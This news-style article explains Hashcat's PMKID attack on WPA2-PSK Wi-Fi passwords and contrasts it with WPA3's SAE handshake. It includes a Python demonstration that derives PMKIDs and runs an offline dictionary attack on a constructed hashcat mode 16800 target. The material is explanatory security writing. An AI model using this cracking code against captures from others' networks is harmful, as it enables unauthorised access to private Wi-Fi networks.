Hashcat describes new attack on WPA2
The makers of the password-cracking tool Hashcat have described a new technique for attacking WPA/WPA2-PSK passwords. The attack relies on capturing the Pairwise Master Key Identifier (PMKID) from an access point.
According to Hashcat, the technique came to light while the researchers were looking for ways to attack the new WPA3 standard. The attack targets the RSN IE (Robust Security Network Information Element) carried in an EAPOL frame. EAPOL stands for Extensible Authentication Protocol over LAN and is the transport that WPA and WPA2 use for the 4-way handshake, in which a client and an access point prove to each other that they know the same key and derive the keys for the session.
The RSN IE can carry the PMKID, and this value is all an attacker needs to mount an offline attack on WPA-PSK passwords: it is an HMAC-SHA1 over the fixed string "PMK Name" and the MAC addresses of the access point and the client, keyed with the Pairwise Master Key (PMK), which in turn is derived from the Wi-Fi passphrase and the SSID. According to the researchers, the major advantage over previous WPA2 attacks such as KRACK is that no regular user needs to be connected to the network and the attacker no longer has to wait for a 4-way handshake to complete. Instead, the attacker talks to the access point directly, and the PMKID arrives in a single EAPOL frame, the first message of the handshake. One caveat: an access point only includes a PMKID when it supports PMK caching (used for fast roaming), so not every network exposes one.
Because only the start of the authentication exchange is needed, the method makes cracking WPA pre-shared keys easier. Whether cracking with Hashcat then succeeds depends on the length and complexity of the Wi-Fi password. Many users choose a short, simple password for their Wi-Fi network or never change the default one.
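As an added example, not code from Hashcat or from the original article, the following Python reconstructs the PMKID derivation described above (PBKDF2 from passphrase and SSID to PMK, then HMAC-SHA1 over "PMK Name" and the two MAC addresses) and runs a small dictionary attack against a target in hashcat's mode 16800 line format (PMKID*AP_MAC*STA_MAC*ESSID_hex). The SSID, MAC addresses, passphrase and wordlist are constructed here for the demonstration and are not a real capture.

```python
import hashlib
import hmac

# Fixed label from IEEE 802.11i used when deriving the PMKID.
PMK_NAME_LABEL = b"PMK Name"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the expensive step that dominates the cost of every candidate guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): the first 16 bytes of the
    HMAC over the label, the AP (authenticator) MAC and the station (supplicant) MAC."""
    return hmac.new(pmk, PMK_NAME_LABEL + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def make_16800_line(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes) -> str:
    """Build a hashcat mode 16800 line (PMKID*AP_MAC*STA_MAC*ESSID_hex) for a known
    passphrase. Used here only to construct a sample target for the demo."""
    pmkid = compute_pmkid(derive_pmk(passphrase, ssid), ap_mac, sta_mac)
    return "*".join([pmkid.hex(), ap_mac.hex(), sta_mac.hex(), ssid.encode().hex()])


def parse_16800_line(line: str):
    """Split a mode 16800 line into (pmkid, ap_mac, sta_mac, ssid)."""
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(ssid_hex).decode())


def crack_pmkid(line: str, wordlist):
    """Offline dictionary attack: derive the PMK for each candidate and compare the
    resulting PMKID with the captured one. Returns the passphrase or None."""
    pmkid, ap_mac, sta_mac, ssid = parse_16800_line(line)
    for candidate in wordlist:
        # WPA-PSK passphrases are 8..63 characters; skip impossible candidates
        # before paying for PBKDF2.
        if not 8 <= len(candidate) <= 63:
            continue
        guess = compute_pmkid(derive_pmk(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, pmkid):
            return candidate
    return None


# Constructed sample: hypothetical SSID, locally administered MACs and a weak
# passphrase, chosen for this demo (not a real capture).
SAMPLE_SSID = "HomeNetwork"
SAMPLE_AP_MAC = bytes.fromhex("020000000001")   # access point (AA)
SAMPLE_STA_MAC = bytes.fromhex("020000000002")  # attacker's own station MAC (SPA)
SAMPLE_LINE = make_16800_line("summer2018", SAMPLE_SSID, SAMPLE_AP_MAC, SAMPLE_STA_MAC)
SAMPLE_WORDLIST = ["short", "password", "letmein1", "summer2018", "Welcome123"]

if __name__ == "__main__":
    print("target:   ", SAMPLE_LINE)
    print("recovered:", crack_pmkid(SAMPLE_LINE, SAMPLE_WORDLIST))
```

Two things the code makes visible that the paragraph does not: the station MAC baked into the PMKID is whatever address the attacker associated with, so no victim client is involved at all; and the per-guess cost is exactly the same PBKDF2 as for a captured 4-way handshake, so the PMKID attack removes the need for a client and a completed handshake but does not make weak-password cracking any cheaper or strong passwords any weaker.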
The method does not work against the new WPA3. The successor to WPA2 uses a more robust handshake, Simultaneous Authentication of Equals (SAE). SAE still uses a password, but it is a password-authenticated key exchange that never puts anything on the air an eavesdropper could test candidate passwords against offline. This should prevent offline dictionary attacks on Wi-Fi passwords, so users are protected even with weak passwords: an attacker is limited to online guesses against the access point itself.